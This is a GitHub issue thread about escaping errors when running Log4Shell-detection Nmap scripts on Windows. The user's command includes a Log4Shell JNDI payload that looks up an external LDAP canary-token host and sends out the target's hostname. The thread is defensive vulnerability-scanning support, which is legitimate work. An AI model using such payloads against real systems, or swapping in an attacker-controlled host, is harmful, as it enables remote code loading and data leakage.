-
Notifications
You must be signed in to change notification settings - Fork 48
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Failed to initialize script engine - Arguments did not parse #9
Comments
Hello! Thanks for reporting. Since it is windows. You should use following escaping: According to: Let me know if it works for you! |
Managed to work for you? |
Thanks for your response :) Nmap complains if you don't add ticks (`) before the curly brackets, so I added them and was able to begin the scan. I am getting a new error but haven't looked into it properly yet: |
Usually that means escaping was not good. Add Have you tried with the basic scan?
|
Running Nmap on Windows:
.\nmap.exe --script=http-log4shell,ssh-log4shell,imap-log4shell '--script-args=log4shell.payload="${jndi:ldap://x${hostName}.L4J.xxxx.canarytokens.com/a}"' -T4 -n -p80 --script-timeout=1m 10.0.0.1
I get the following error:
Scripts are in the same directory as nmap. Any ideas?
The text was updated successfully, but these errors were encountered: